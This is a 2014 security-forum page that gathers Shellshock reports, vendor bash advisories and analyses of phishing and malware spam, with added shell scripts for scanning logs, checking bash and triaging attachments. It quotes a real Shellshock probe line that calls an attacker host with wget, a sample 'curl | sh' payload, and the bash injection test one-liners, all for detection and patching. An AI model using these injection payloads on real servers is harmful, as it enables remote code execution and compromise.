News: Cexx forums, with volunteers dedicated to helping you remove malware and stay protected
 
October 31, 2014, 11:10:25
 81 
 on: September 28, 2014, 02:35:20  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Shellshock and MangoHost (mangohost .net) / 83.166.234.0/24
- http://blog.dynamoo.com/2014/09/evil-network-shellshock-and-mangohost.html
28 Sep 2014 - "I came across this particular sewer while looking in my logs for Shellshock access attempts yesterday... probing my server and attempting to WGET back to their own network to enumerate vulnerable hosts.
   dynamoo.com:80 83.166.234.133 - - [27/Sep/2014:03:08:37 +0100] "GET / HTTP/1.0" 200 11044 "-" "() { :;}; /bin/bash -c \"wget -q -O /dev/null http ://ad.dipad .biz/test/http ://dynamoo .com/\""
ad.dipaz .biz is hosted on 83.166.234.186, so pretty close to the probing IP of 83.166.234.133 which made me suspicious of the whole range... MangoHost claims to be in Moldova, but almost everything to do with them is in Russian, indicating perhaps that whoever runs this is part of the large Russian ethnic minority in Moldova*. MangoHost is run by one Victor Letkovski (виктор летковский) who lives in Chisinau. Until the past few days, MangoHost was hosting the -ransomware- sites listed here** [pastebin]. Past customers include the infamous Darkode forum back in June, and indeed it still hosts jab.darkode .com, whatever that may be (you can guarantee it is nothing good). Currently hosted domains include a collection of -fake- browser plugins, some -malvertising- sites, some porn, spam sites, hacker resources, -ransomware- domains and what might appear to be some fake Russian law firms... I would strongly recommend blocking all traffic to and from 83.166.234.0/24 if you can do it."
(More detail at the dynamoo URL above.)
* https://en.wikipedia.org/wiki/Russians_in_Moldova

** http://pastebin.com/2mC1pXaJ

83.166.234.186: https://www.virustotal.com/en/ip-address/83.166.234.186/information/

83.166.234.133: https://www.virustotal.com/en/ip-address/83.166.234.133/information/
___

Shellshock in the Wild
- http://www.fireeye.com/blog/uncategorized/2014/09/shellshock-in-the-wild.html
Sep 27, 2014 - "... We have observed a significant amount of overtly malicious traffic leveraging BASH, including:
- Malware droppers
- Reverse shells and backdoors
- Data exfiltration
- DDoS
Some of this suspicious activity appears to be originating from Russia. We suspect bad actors may be conducting an initial dry run, in preparation for a real, potentially larger-scale attack. We believe it’s only a matter of time before attackers exploit the vulnerability to redirect users to malicious hosts, which can result in further compromise... Exploitation Techniques: The Shellshock traffic we have been able to observe is still quite chaotic. It is largely characterized by high volume automated scans and PoC-like exploit scripts... payload is a very small ELF executable (md5: 959aebc9b44c2a5fdd23330d9be1101e) that was submitted to VirusTotal yesterday with 0 detections. It simply creates a reverse shell, connecting to the same IP the payload was downloaded from: 82.118.242.223... We will continue monitoring the threats and keep you updated..."
(More detail at the fireeye URL above.)

- http://www.symantec.com/connect/blogs/shellshock-all-you-need-know-about-bash-bug-vulnerability
Updated: 29 Sep 2014 - "... Businesses, in particular website owners, are most at risk from this bug and should be aware that its exploitation may allow access to their data and provide attackers with a foothold on their network. Accordingly, it is of critical importance to apply any available patches immediately. Linux vendors have issued security advisories for the newly discovered vulnerability including patching information.
Debian: https://www.debian.org/security/2014/dsa-3032
Ubuntu: http://www.ubuntu.com/usn/usn-2362-1/
Red Hat: https://access.redhat.com/articles/1200223*
CentOS: http://centosnow.blogspot.com/2014/09/critical-bash-updates-for-centos-5.html
Novell SUSE: http://support.novell.com/security/cve/CVE-2014-6271.html
*Red Hat has updated its advisory to include fixes for a number of remaining issues:
- https://rhn.redhat.com/errata/RHSA-2014-1306.html
Last updated on: 2014-09-30
If a patch is unavailable for a specific distribution of Linux or Unix, it is recommended that users switch to an alternative shell until one becomes available.
For consumers: Consumers are advised to apply patches to routers and any other web-enabled devices as and when they become available from vendors. Users of Apple’s Mac OS X should be aware that the operating system currently ships with a vulnerable version of Bash. Mac users should apply any patches for OS X when they become available.
Symantec Protection: Symantec has created an Intrusion Prevention signature for protection against this vulnerability:
27907 - OS Attack: GNU Bash CVE-2014-6271
> http://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=27907
Symantec will continue to investigate this vulnerability and provide more details as they become available."

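The access-log line quoted in the dynamoo post above shows what a Shellshock probe looks like from the server side: a User-Agent that begins with a bash function definition, `() {`, followed by the command the attacker wants run. As an added example, not code from either blog or from this forum, the script below scans constructed sample lines in Apache "combined" format for that prefix, lists the probing sources and the wget/curl callback URLs the injected command fetches, and emits iptables rules for review. The sample IPs (RFC 5737 documentation ranges), the example.* hostnames and the regex are this example's own assumptions, not hosts named on the page.

```sh
#!/bin/sh
# Added example: scan web-server access logs for Shellshock probes.
# Constructed sample lines in Apache "combined" format (assumption: documentation
# IPs and example.* hosts, not the hosts from the blog posts).
SAMPLE_LOG='203.0.113.10 - - [27/Sep/2014:03:08:37 +0100] "GET / HTTP/1.0" 200 11044 "-" "() { :;}; /bin/bash -c \"wget -q -O /dev/null http://example.net/test/\""
198.51.100.7 - - [27/Sep/2014:03:10:02 +0100] "GET /cgi-bin/status HTTP/1.1" 200 512 "() { :; }; /bin/bash -c \"curl -s http://example.org/x.sh | sh\"" "Mozilla/5.0"
192.0.2.44 - - [27/Sep/2014:03:11:15 +0100] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.10 - - [27/Sep/2014:03:12:40 +0100] "GET /cgi-bin/test.cgi HTTP/1.1" 404 210 "-" "() { ignored;}; echo Content-Type: text/plain; echo; /usr/bin/id"'

# A probe starts a header value with a bash function definition, "() {". A CGI-style
# server exports request headers as environment variables (HTTP_USER_AGENT,
# HTTP_REFERER, ...), so an unpatched bash executes whatever follows the closing
# brace. The regex tolerates the spacing variants seen in the wild.
SHELLSHOCK_RE='\(\)[[:space:]]*\{'

shellshock_hits() {
    # $1: access log file. Prints every line carrying the probe prefix anywhere in
    # the request line, referrer or user-agent. "|| true" keeps a clean log from
    # aborting callers that run under "set -e" when grep matches nothing.
    grep -E "$SHELLSHOCK_RE" "$1" || true
}

shellshock_hit_count() {
    shellshock_hits "$1" | wc -l | tr -d ' '
}

shellshock_sources() {
    # Unique client IPs that sent a probe (first field of the combined format).
    shellshock_hits "$1" | awk '{ print $1 }' | sort -u
}

shellshock_callbacks() {
    # URLs the injected command fetches with wget or curl: the attacker's staging
    # or enumeration hosts, worth blocking or sinkholing.
    shellshock_hits "$1" | grep -oE '(wget|curl)[^"]*' | grep -oE 'https?://[^ "\\]+' | sort -u
}

shellshock_block_rules() {
    # Emit (do not apply) one DROP rule per probing source, for review before it
    # goes into a firewall or an ipset.
    shellshock_sources "$1" | while read -r ip; do
        printf 'iptables -I INPUT -s %s -j DROP\n' "$ip"
    done
}

# Stand-alone run over the constructed sample.
tmp=$(mktemp)
printf '%s\n' "$SAMPLE_LOG" > "$tmp"
echo "probes: $(shellshock_hit_count "$tmp")"
echo "sources:"; shellshock_sources "$tmp"
echo "callbacks:"; shellshock_callbacks "$tmp"
echo "rules:"; shellshock_block_rules "$tmp"
rm -f "$tmp"
```

On a real server, point the functions at the live access log (or at `zcat` output of rotated logs); the rules are printed rather than applied so that a legitimate scanner or a shared NAT address is not dropped blindly.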

 82 
 on: September 27, 2014, 05:27:25  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Oracle - Security Alert CVE-2014-7169 released
- https://blogs.oracle.com/security/entry/security_alert_cve_2014_7169
Sep 26, 2014 - "Oracle just released Security Alert CVE-2014-7169*. Vulnerability CVE-2014-7169, previously known as CVE-2014-6271, affects GNU Bash, and if successfully exploited can result in providing a malicious attacker the ability to fully compromise a targeted system... Today’s Security Alert lists the products that Oracle has currently determined to be vulnerable to CVE-2014-7169. Download and installation instructions are provided for those products with available patches. Note that the fixes provided with this Security Alert address both vulnerabilities CVE-2014-7169 and CVE-2014-6271. The Security Alert Advisory will be updated to reflect the availability of fixes for additional products when they have successfully completed testing..."  
* http://www.oracle.com/technetwork/topics/security/alert-cve-2014-7169-2303276.html
2014-Sep-30 - Rev. 5 - Added additional CVEs to Solaris and Linux matrices
CVE-2014-6271, CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187

- http://www.oracle.com/technetwork/topics/security/alert-cve-2014-7169-2303276.html#PIN
"Oracle has determined that following Oracle products are vulnerable to CVE-2014-7169 and CVE-2014-6271. Fixes for these products will be distributed as they become available and this Security Alert will be updated to reflect the availability of these fixes..."
2014-Sep-30 - Rev 5. Added additional CVEs to Solaris and Linux matrices

- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271 - 10.0 (HIGH)
Last revised: 10/10/2014
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169 - 10.0 (HIGH)
Last revised: 10/10/2014

* http://www.oracle.com/technetwork/topics/security/bashcve-2014-7169-2317675.html
"... list of affected products and mitigation instructions as of October 20, 2014 at 06:38 PM Pacific..."

> https://linux.oracle.com/pls/apex/f?p=105:21:3597568493916265
Last entry: 2014-10-20

- http://www.oracle.com/technetwork/topics/security/alert-cve-2014-7169-verbose-2303278.html#SUNS

Advisory (ICSA-14-269-01)
Bash Command Injection Vulnerability
- https://ics-cert.us-cert.gov//advisories/ICSA-14-269-01
Last revised: Oct 03, 2014


 83 
 on: September 26, 2014, 17:13:59  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Huge Update – 1789 Domains
- http://www.malwaredomains.com/?p=3663
September 25th, 2014 - "... -1789- domains were added two days ago. Sources: www.spamhaus.org, safebrowsing.google.com, osint.bambenekconsulting.com..."


 84 
 on: September 26, 2014, 04:02:44  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Amazon phish ...
- http://myonlinesecurity.co.uk/amazon-account-confirmation-phishing/
26 Sep 2014 - "'Account Confirmation' pretending to come from Amazon .co.uk <auto-confirm@ amazon .co.uk> is a phishing email designed to get your Amazon log in details and then your bank, credit card, address and personal details so they can imitate you and take over your accounts and clean you out...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/Amazon-Account-Confirmation.png

Following the link in this Amazon Account Confirmation or other spoofed emails takes you to a website that looks -exactly- like the real Amazon.co.uk site. You are then taken through loads of steps to input a lot of private and personal information. Not only will this information enable them to clear out & use your Amazon account, but also your Bank Account, Email details, webspace (if you have it). They then want enough information to completely impersonate you and your identity not only in cyberspace but in real life. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email or follow links in them ..."
___

Fake docs, voicemail, fax SPAM ...
- http://blog.dynamoo.com/2014/09/malware-spam-employee-documents.html
26 Sep 2014 - "... different types of spam to increase click through rates and now some tricky tools to prevent analysis of the malware.

 Employee Documents - Internal Use
From:     victimdomain
Date:     26 September 2014 09:41
Subject:     Employee Documents - Internal Use
DOCUMENT NOTIFICATION, Powered by NetDocuments
DOCUMENT NAME: Employee Documents ...
Documents are encrypted in transit and store in a secure repository...

 You have a new voice
From:     Voice Mail [Voice.Mail@ victimdomain]
Date:     26 September 2014 09:30
Subject:     You have a new voice
You are receiving this message because we were unable to deliver it, voice message did not go through because the voicemail was unavailable at that moment.
* The reference number for this message is _qvs4004011004_001
The transmission length was 26
Receiving machine ID : ES7D-ZNA1D-QF3E
To download and listen your voice mail please follow the link ...

 RBS: BACS Transfer : Remittance for JSAG244GBP
From:     Douglas Byers [creditdepart@ rbs .co.uk]
Date:     26 September 2014 10:12
Subject:     BACS Transfer : Remittance for JSAG244GBP
We have arranged a BACS transfer to your bank for the following amount : 4596.00
Please find details at our secure link ...

 New Fax
From:     FAX Message [fax@victimdomain]
Date:     26 September 2014 10:26
Subject:     New Fax
You have received a new fax .
Date/Time: Fri, 26 Sep 2014 16:26:36 +0700.
Your Fax message can be downloaded here ...


... The attack has evolved recently.. usually these malicious links forward on to another site which had the malicious payload. Because all the links tended to end up at the same site, it was quite easy to block that site and foil the attack. But recently the payload is spread around many different sites making it harder to block. A new one today is that the landing page is somewhat obfuscated to make it harder to analyse, and this time the download is a plain old .scr file rather than a .zip. I've noticed that many anti-virus products are getting quite good at detecting the malicious ZIP files with a generic detection, but not the binary within. By removing the ZIP wrapper, the bad guys have given one less hook for AV engines to find.. malicious binary document7698124-86421_pdf.scr is downloaded from the remote site which has a VirusTotal detection rate of 2/55*. The Anubis report shows the malware attempting to phone home to padav .com which is probably worth blocking."
* https://www.virustotal.com/en-gb/file/9819d4027893bcb20cdefc49632008e71672fb3eaefbbb0ef1b626a52dd6c6c4/analysis/1411724904/
... Behavioural information
DNS requests
padav .com (184.106.55.51)
TCP connections
188.165.198.52: https://www.virustotal.com/en-gb/ip-address/188.165.198.52/information/
184.106.55.51: https://www.virustotal.com/en-gb/ip-address/184.106.55.51/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en-gb/ip-address/137.170.185.211/information/
___

Bill.com Spam
- http://threattrack.tumblr.com/post/98466527048/bill-com-spam
Sep 26, 2014 - "Subjects Seen:
   Payment Details [Incident: 711935-599632]
Typical e-mail details:
   We could not process your Full Payment Submission. The submission for reference ***/UT5236489 was successfully received and was not processed. Check attached copy (PDF Document) for more information.
    Regards,
    Bill.com Payment Operations


Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/8d0ecbce8726c0f09eda8b8e4dbc7c45/tumblr_inline_ncigloYHaW1r6pupn.png

Malicious File Name and MD5:
    bill_com_Payment_Details_711935-599632.zip (02EE805D1EACD739BEF4697B26AAC847)
    bill_com_payment_details_ID0000012773616632715381235.pdf.exe (AD24CD2E14DCBF199078BDBBAE4BF0CA)


Tagged: bill.com, Vawtrak
___

More Fakes - HMRC, BT, RBS SPAM
- http://blog.dynamoo.com/2014/09/malware-spam-hmrc-taxes-application.html
26 Sep 2014 - "Another bunch of spam emails, with the same payload* as this earlier spam run*.

HMRC taxes application with reference LZV9 0Q3E W5SD N3GV received
From:     noreply@ taxreg .hmrc .gov.uk [noreply@ taxreg .hmrc .gov.uk]
Date:     26 September 2014 12:26
Subject:     HMRC taxes application with reference LZV9 0Q3E W5SD N3GV received
The application with reference number LZV9 0Q3E W5SD N3GV submitted by you or your agent to register for HM Revenue & Customs (HMRC) taxes has been received and will now be verified. HMRC will contact you if further information is needed.
Please download/view your HMRC documents here ...

 Important - BT Digital File
From:     Cory Sylvester [Cory.Sylvester@ bt .com]
Date:     26 September 2014 12:51
Subject:     Important - BT Digital File
Dear Customer,
This email contains your BT Digital File. Please scan attached file and reply to this email.
To download your BT Digital File please follow the link ...

 RBS Bankline: Outstanding invoice
    From:     Bankline.Administrator@ rbs .co.uk [Bankline.Administrator@ rbs .co.uk]
    To:     <REDACTED>
    Date:     26 September 2014 13:05
    Subject:     Outstanding invoice
       {_BODY_TXT}
    Dear [redacted],
    Please find the attached copy invoice which is showing as unpaid on our ledger.
    To download your invoice please click here ...


In the sample I looked at the malware page downloaded an archive document26092014-008_pdf.zip which in turn contains document26092014-008_pdf.exe which is the same payload* as earlier..."
* http://blog.dynamoo.com/2014/09/malware-spam-employee-documents.html
___

Fake Barclays SPAM – PDF malware
- http://myonlinesecurity.co.uk/barclays-transaction-complete-fake-pdf-malware/
26 Sep 2014 - "'Barclays Transaction not complete' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Unable to complete your most recent Transaction.  Currently your transaction has a pending status.
    If the transaction was made by mistake please contact our customer service.
    For more details please download payment receipt ...


26 September 2014: PaymentReceipt262.zip:  Extracts to: PaymentReceipt262.exe
Current Virus total detections: 2/55* . This 'Barclays Transaction not complete' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/5149eb19e642e141818326b4ad670e9b74496881ea1de69c13786f021efda559/analysis/1411738617/
... Behavioural information
DNS requests
wcdnitaly .org (195.110.124.133)
TCP connections
188.165.198.52: https://www.virustotal.com/en/ip-address/188.165.198.52/information/
195.110.124.133: https://www.virustotal.com/en/ip-address/195.110.124.133/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/


 85 
 on: September 26, 2014, 02:29:01  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

- http://tools.cisco.com/security/center/publicationListing.x

GNU Bash Environmental Variable Command Injection Vuln
Advisory ID: cisco-sa-20140926-bash
- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash
2014 Sep 26 - "Summary: On September 24, 2014, a vulnerability in the Bash shell was publicly announced. The vulnerability is related to the way in which shell functions are passed through environment variables. The vulnerability may allow an attacker to inject commands into a Bash shell, depending on how the shell is invoked. The Bash shell may be invoked by a number of processes including, but not limited to, telnet, SSH, DHCP, and scripts hosted on web servers.
All versions of GNU Bash starting with version 1.14 are affected by this vulnerability and the specific impact is determined by the characteristics of the process using the Bash shell. In the worst case, an unauthenticated remote attacker would be able to execute commands on an affected server. However, in most cases involving Cisco products, exploitation of the vulnerability results in an authenticated attacker having the ability to execute commands for which they are not authorized. A number of Cisco products ship with or leverage an affected version of the Bash shell. This advisory will be updated as additional information becomes available. Cisco may release free software updates that address this vulnerability if a product is determined to be affected by this vulnerability...
(See "Affected Products" list at the URL above.)
Rev 1.12 - 2014-Oct-15 - Updated details on where to find fix information, details on testing tools, and the Affected Products, Vulnerable Products, and Products Confirmed Not Vulnerable sections.

Cisco IronPort - GNU bash...
- http://www.securitytracker.com/id/1030961
Oct 2 2014

Cisco WebEx Meetings Server ...
- http://www.securitytracker.com/id/1030940
CVE Reference: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3395
Oct 1 2014
- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014-3395
Last Updated: 2014 Sep 30

- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3400
Last revised: 10/06/2014
- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014-3400
Last Updated: 2014 Oct 3

Advisory (ICSA-14-269-01)
Bash Command Injection Vulnerability
- https://ics-cert.us-cert.gov//advisories/ICSA-14-269-01
Last revised: Oct 03, 2014

Also see: https://www.us-cert.gov/ncas/current-activity/2014/09/24/Bourne-Again-Shell-Bash-Remote-Code-Execution-Vulnerability
Last revised: Sep 30, 2014

- https://www.us-cert.gov/ncas/alerts/TA14-268A
Last revised: Sep 30, 2014

- http://www.kb.cert.org/vuls/id/252743
Last revised: 10 Oct 2014

Bash vuln -aka- Shellshock ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/shell-attack-on-your-server-bash-bug-cve-2014-7169-and-cve-2014-6271/
Sep 25, 2014
> http://about-threats.trendmicro.com/us/threat-intelligence/internet-of-everything/attack-scenarios/the-shellshock-vulnerability-bash-bug

FREE protection for Shellshock
- http://www.trendmicro.com/us/security/shellshock-bash-bug-exploit/index.html

- http://www.securitytracker.com/id/1030890
CVE Reference:
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6277 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6278 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7186 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7187 - 10.0 (HIGH)
Updated: Oct 6 2014 - "... archive entry has one or more follow-up message(s) listed..."
Original Entry Date: Sep 24 2014
Impact: Execution of arbitrary code via local system, Execution of arbitrary code via network, User access via local system, User access via network
Vendor Confirmed: Yes Exploit Included: Yes  
Version(s): 4.3 ...
... vulnerability is being actively exploited...
Vendor URL: https://www.gnu.org/software/bash/
___

Semiannual Cisco IOS Software Security Advisory Bundled Publication
- http://www.cisco.com/web/about/security/intelligence/Cisco_ERP_sep14.html
Sep 24, 2014 - "... Use the Cisco IOS Software Checker* to quickly determine whether a given Cisco IOS Software release is exposed to Cisco product vulnerabilities..."
* http://tools.cisco.com/security/center/selectIOSVersion.x

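The Cisco summary above explains the mechanism (a function definition carried in an environment variable, executed when bash starts) and the advisories list six CVEs. Before chasing vendor fixes, a practitioner wants to know whether the bash on a given host is still affected. The script below is an added example, not Cisco's test tool or any vendor's: it imports a crafted function definition through the environment, the same path a CGI server, a DHCP client hook or an sshd ForceCommand would use, and reports on CVE-2014-6271 and CVE-2014-7169 only. The other four CVEs in the advisory (6277, 6278, 7186, 7187) need their own probes, which are not included here.

```sh
#!/bin/sh
# Added example: probe the local bash for two of the Shellshock CVEs named in the
# advisories above. Nothing here is a vendor tool; both probes are the widely
# circulated one-liners wrapped so that they report a verdict instead of output.

bash_check_6271() {
    # Original bug: an exported variable whose value is a function definition is
    # parsed at start-up, and anything after the closing brace is executed too.
    command -v bash >/dev/null 2>&1 || { echo "CVE-2014-6271: no bash on PATH"; return 0; }
    out=$(env x='() { :;}; echo vulnerable' bash -c 'echo probe' 2>/dev/null || true)
    case "$out" in
        *vulnerable*) echo "CVE-2014-6271: vulnerable" ;;
        *)            echo "CVE-2014-6271: patched" ;;
    esac
}

bash_check_7169() {
    # Incomplete first fix: a malformed definition leaves the parser in a state
    # where the redirection leaks into the next command, so on an unpatched bash
    # "echo date" writes to a file literally named "echo" in the current directory.
    # Run in a scratch directory so a vulnerable host is not left with stray files.
    command -v bash >/dev/null 2>&1 || { echo "CVE-2014-7169: no bash on PATH"; return 0; }
    dir=$(mktemp -d)
    ( cd "$dir" && env X='() { (a)=>\' bash -c 'echo date' >/dev/null 2>&1; true )
    if [ -e "$dir/echo" ]; then
        echo "CVE-2014-7169: vulnerable"
    else
        echo "CVE-2014-7169: patched"
    fi
    rm -rf "$dir"
}

shellshock_host_report() {
    # One line per CVE plus the bash version string, for pasting into a ticket.
    bash_check_6271
    bash_check_7169
    printf 'bash: %s\n' "$(bash --version 2>/dev/null | head -n 1)"
}

# Stand-alone run.
shellshock_host_report
```

A "patched" verdict for these two CVEs does not close the item: the Red Hat and Oracle entries above were revised several times to add the later CVEs, so the version string in the report should still be compared against the distribution's final errata.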

 86 
 on: September 25, 2014, 04:33:12  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Fake Bank transfers/invoice SPAM ...
- http://blog.dynamoo.com/2014/09/malware-spam-rbs-bacs-transfer-sage.html
25 Sep 2014 - "... very aggressive spam run this morning, with at least -four- different email formats pushing the -same- malicious download.

RBS / Riley Crabtree: "BACS Transfer : Remittance for JSAG814GBP"
    From:     Riley Crabtree [creditdepart@ rbs .co.uk]
    Date:     25 September 2014 10:58
    Subject:     BACS Transfer : Remittance for JSAG814GBP
    We have arranged a BACS transfer to your bank for the following amount : 4946.00
    Please find details at our secure link ...

 Sage Account & Payroll: "Outdated Invoice"
    From:     Sage Account & Payroll [invoice@ sage .com]
    Date:     25 September 2014 10:53
    Subject:     Outdated Invoice
    Sage Account & Payroll
    You have an outdated invoice from Sage Accounting that is ready for payment. To find out more details on this invoice, please follow the link ...

Screenshot: https://1.bp.blogspot.com/-8Mx-CTYIitE/VCPrdXzlOiI/AAAAAAAAFvA/YGCgcp8GX2s/s1600/sage2.png

 Lloyds Commercial Bank: "Important - Commercial Documents"
    From:     Lloyds Commercial Bank [secure@ lloydsbank .com]
    Date:     25 September 2014 11:36
    Subject:     Important - Commercial Documents
    Important account documents
    Reference: C400
    Case number: 05363392
    Please review BACs documents.
    Click link below ...

 NatWest Invoice: "Important - New account invoice
    From:     NatWest Invoice [invoice@ natwest .com]
    Date:     25 September 2014 10:28
    Subject:     Important - New account invoice
    Your latest NatWest invoice has been uploaded for your review. If you have any questions regarding this invoice, please contact your NatWest service team at the number provided on the invoice for assistance.
    To view/download your invoice please click here ...


The links in the emails go to different download locations to make it harder to block... In each case the page then directs the victim to download the file Invoice_09252014.zip from the same directory as the html file. This ZIP file contains a malicious executable Invoice_09252014.scr which currently has a VirusTotal detection rate of 3/54*. The Anubis report shows that it phones home to ukrchina-logistics .com which is probably worth blocking or monitoring access to."
* https://www.virustotal.com/en-gb/file/1397ff56e47b642ff1f4eaaaedc3b84fc5cd7c619b25a894a57dabe62987d84c/analysis/1411638249/
... Behavioural information
DNS requests
ukrchina-logistics .com
TCP connections
188.165.198.52: https://www.virustotal.com/en-gb/ip-address/188.165.198.52/information/
91.196.0.119

- http://threattrack.tumblr.com/post/98386009528/sage-software-invoice-spam
Sep 25, 2014
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/c600697c85ad23d80119101ea06360d0/tumblr_inline_ncglljx1ql1r6pupn.png
Tagged: Sage, Upatre
___

Fake BCA SPAM - PDF malware
- http://myonlinesecurity.co.uk/bca-banking-24-09-14-fake-pdf-malware/
25 Sep 2014 - "'BCA Banking 24.09.14' pretending to come from hallsaccounts <hallsaccounts@ hallsgb .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Accounts Dept
    Halls Holdings Ltd
    Tel: 01743 450700
    Fax: 01743 443759 ...


25 September 2014: BCA Banking 24.09.14.pdf.zip : Extracts to: BCA Banking 24.09.14.pdf.exe
Current Virus total detections: 4/53* . This BCA Banking 24.09.14 is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like an image of a barcode to try to fool you instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/cfd9d4f6fc16e6cf4f5960b5c1b3ad5724f86ec0eefd6e87ab154c4b1e156443/analysis/1411646762/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Fake voice mail SPAM – wav malware
- http://myonlinesecurity.co.uk/outlook-received-voice-mail-fake-wav-malware/
25 Sep 2014 - "'You have received a voice mail' pretending to come from Microsoft Outlook [no-reply@ Your domain] is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
     You received a voice mail : VOICE7838396453.wav (26 KB)
    Caller-Id: 7838396453
    Message-Id: ID9CME
    Email-Id: [redacted]
    This e-mail contains a voice message.
    Download and extract the attachment to listen the message.
    Sent by Microsoft Exchange Server


25 September 2014 VOICE7838396453.zip (56kb): Extracts to: voicemessage.scr
Current Virus total detections: 1/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav (sound) file instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/c97b0291ac92a49293a1c8e5a9145241d2e09f9b53df8c13c70ca33701090773/analysis/1411657167/
... Behavioural information
TCP connections
23.21.52.195: https://www.virustotal.com/en/ip-address/23.21.52.195/information/
95.100.255.137: https://www.virustotal.com/en/ip-address/95.100.255.137/information/
194.150.168.70: https://www.virustotal.com/en/ip-address/194.150.168.70/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Fake Gov't e-mail SCAM
- https://www.ic3.gov/media/2014/140924.aspx
Sep 24, 2014 - "Cybercriminals posing as Internet Crime Complaint Center (IC3) employees are defrauding the public. The IC3 has received complaints from victims who were receiving e-mails purported to be from the IC3...  Victims report that the unsolicited e-mail sender is a representative of the IC3. The e-mails state that a criminal report was filed on the victim’s name and social security number and legal papers are pending. Scammers impersonate an IC3 employee to increase credibility and use threats of legal action to create a sense of urgency. Victims are informed they have one to two days from the date of the complaint to contact the scammers. Failure to respond to the e-mail will result in an arrest warrant issued to the victim. Some victims stated they were provided further details regarding the ‘criminal charges’ to include violations of federal banking regulations, collateral check fraud, and theft deception. Other victims claimed that their address was correct but their social security number was incorrect. Victims that requested additional information from the scammer were instructed to obtain prepaid money cards to avoid legal action. Victims have reported this -scam- in multiple states...  If you receive this type of e-mail:
- Resist the pressure to act quickly.
- -Never- wire money based on a telephone request or in an e-mail, especially to an overseas location.
The IC3 -never- charges the public for filing a complaint and will -never- threaten to have them arrested if they do not respond to an e-mail..."

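This post and the 26 September run above describe the same trick from the sender's side: an executable named so that it reads as a PDF, a WAV or a barcode image once Explorer hides the real extension, delivered with or without a ZIP wrapper. As an added example, not code from either blog, the script below applies that heuristic to attachment names and to an archive's member list (so a ZIP is judged by what it wraps, which is the hook the dynamoo post says generic AV detection relies on). The extension lists are this example's own assumption of what a Windows desktop runs on double-click; the sample names are built from the file names quoted in the posts.

```sh
#!/bin/sh
# Added example: triage mail attachment names the way the spam runs above abuse
# them. Extension lists are an assumption of this example, not from the posts.

# Extensions Windows runs when double-clicked, whatever icon the file shows.
EXEC_EXTS="exe scr pif com bat cmd vbs vbe js jse wsf hta"
# Archives a gateway often passes through but that hide the inner name.
ARCHIVE_EXTS="zip rar 7z cab"
# Document/media extensions a disguised name puts in front of the real one.
DECOY_EXTS="pdf doc docx xls xlsx wav mp3 jpg png txt"

lc() { printf '%s' "$1" | tr 'A-Z' 'a-z'; }

in_list() {
    # $1: word, $2: space-separated list. Exit 0 if present.
    for w in $2; do [ "$1" = "$w" ] && return 0; done
    return 1
}

attachment_verdict() {
    # $1: attachment file name. Prints EXEC-DISGUISED, EXEC, ARCHIVE or OK.
    name=$(lc "$1")
    case "$name" in *.*) ;; *) echo OK; return 0 ;; esac
    ext=${name##*.}
    stem=${name%.*}
    if in_list "$ext" "$EXEC_EXTS"; then
        # "invoice.pdf.exe" and "report_pdf.scr" both read as a document once the
        # final extension is hidden: look at the last token before it.
        inner=$(printf '%s' "$stem" | sed -E 's/.*[._-]//')
        if in_list "$inner" "$DECOY_EXTS"; then echo EXEC-DISGUISED; else echo EXEC; fi
    elif in_list "$ext" "$ARCHIVE_EXTS"; then
        echo ARCHIVE
    else
        echo OK
    fi
}

archive_worst_verdict() {
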